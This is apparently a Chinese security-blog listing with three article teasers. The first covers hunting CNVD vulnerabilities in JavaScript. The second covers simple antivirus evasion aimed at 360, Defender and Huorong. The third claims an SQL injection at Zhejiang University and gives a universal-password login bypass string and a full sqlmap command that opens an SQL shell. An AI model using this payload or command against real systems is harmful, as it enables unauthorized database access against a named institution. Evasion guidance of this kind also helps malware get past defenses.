纸豪
cnvd通用漏洞-JS中漏洞挖掘
利用js在挖掘cnvd通用漏洞中的思路以及附带的实战案例。一、前言JS渗透测试是一种针对客户端JavaScript代码的安全测试方法,旨在发现和利用应用程序中潜在的安全漏洞。那么在本文中,我们不去...
用简单的方式做好免杀
免杀这个东西,往深了做,可以做的很难,但是如果只是保持能过国内基本的,所谓360,Defender,火绒这三个经常在项目中遇到的杀软,还是相对简单的。要想简单,核心思路就是白加黑形式的分离免...
浙江大学存在SQL注入
万能密码进入后台,万能密码')or('a'='a 对登陆页面进行跑 sqlmappython sqlmap.py -r 1.txt --batch --random-agent --time-sec=2 --risk 3 --sql-shell
